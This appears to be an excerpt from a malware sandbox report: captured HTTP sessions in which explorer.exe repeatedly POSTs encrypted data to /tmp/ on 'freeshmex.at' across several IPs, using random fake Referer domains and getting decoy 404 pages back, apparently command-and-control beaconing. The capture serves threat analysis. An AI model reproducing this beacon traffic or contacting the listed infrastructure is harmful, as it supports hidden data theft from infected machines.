                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    18192.168.2.44971495.107.163.4480C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:25.907423019 CET1260OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://qhcqdle.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 329
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:25.907457113 CET1260OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 63 20 c3 b8
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuc RO\QBGXN,<h7(YcCH+te&4_JP1^SlP;d];uWWDCF`CM7r
                    Nov 24, 2022 20:13:26.099426031 CET1260INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:25 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 50
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1f 62 43 e4 37 01 fe ef 46 ea d0 ec a6 6d 81 3e d9 f7 22 5e 5a 85 84 8b cb 7c 9a 2e 1d 03
                    Data Ascii: #\6bC7Fm>"^Z|.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    19192.168.2.449716109.102.255.23080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:27.645973921 CET1794OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://bussc.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 187
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:27.646132946 CET1794OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 04 6b 2c 90 f4 76 0b 75 21 0e a1 ad
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA ,[k,vu!t>PYp<KwNynBWvoyPqI@SR96<P4X:4tz3
                    Nov 24, 2022 20:13:27.930973053 CET1795INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:27 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.449697211.53.230.6780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:01.762887001 CET138OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://hdnuetf.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 178
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:01.765835047 CET139OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 59 02 de 9b
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuYmChesl[=.-<CyfTb/RV#17V+;$!}G|IYy
                    Nov 24, 2022 20:13:03.711689949 CET139INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:02 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    20192.168.2.449717190.140.74.4380C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:28.179250956 CET1796OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://rfiijpjae.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 179
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:28.179270983 CET1796OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 3c 4c db bf
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu<LKNmVE75;;O[]knF0;R/lOATKfM@)D2S
                    Nov 24, 2022 20:13:29.175075054 CET1796INHTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:28 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    21192.168.2.449718109.102.255.23080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:29.315015078 CET1797OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://bowsudmxn.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 219
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:29.315015078 CET1797OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 3d 30 bd 87
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu=0L/]Ve'_[^5%T*\<`@5P)OFd;I6)CE<PXY r
                    Nov 24, 2022 20:13:29.617204905 CET1798INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:29 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    22192.168.2.449719211.53.230.6780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:29.910173893 CET1799OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://slkwmgvhmh.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 354
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:29.910357952 CET1800OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 7a 58 f9 f8
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuzXIXGese$i[5/%^6'J?9(&y;=X5j1_2Oynl-8ticC6
                    Nov 24, 2022 20:13:30.751532078 CET1800INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:30 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    23192.168.2.449720211.171.233.12980C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:31.030881882 CET1801OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://bpaefk.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 166
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:31.030881882 CET1802OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 22 1b c1 a9
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu"n[q`U~V |7_G;YA(CPIDe$tg~
                    Nov 24, 2022 20:13:31.995224953 CET1802INHTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:31 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    24192.168.2.449721211.53.230.6780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:32.276055098 CET1803OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://uaymxpjge.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 300
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:32.276055098 CET1803OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 77 14 df 90
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuw_ab\g?b~;@J9eKZV& GA ).qR/P}?KL.7/wP*ZNforp)7b
                    Nov 24, 2022 20:13:33.390597105 CET1804INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:32 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    25192.168.2.44972295.107.163.4480C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:33.471035004 CET1805OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://wfwtjemoof.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 277
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:33.471076965 CET1805OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 74 15 e8 fd
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vutz@MlD#2V yfK' Jt7n57=7{^CQ#|{K/,kpgBFWG!t_X_
                    Nov 24, 2022 20:13:33.639409065 CET1806INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:33 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    26192.168.2.449723178.31.176.4280C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:33.809376001 CET1807OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://rpaquepn.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 268
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:33.809408903 CET1807OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 3a 03 ca 9e
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu:a"nO"] 73dyVp|@J=znZSD[8&#.]P"7KOMY3g42uw\CHfv0v
                    Nov 24, 2022 20:13:34.086180925 CET1808INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:33 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
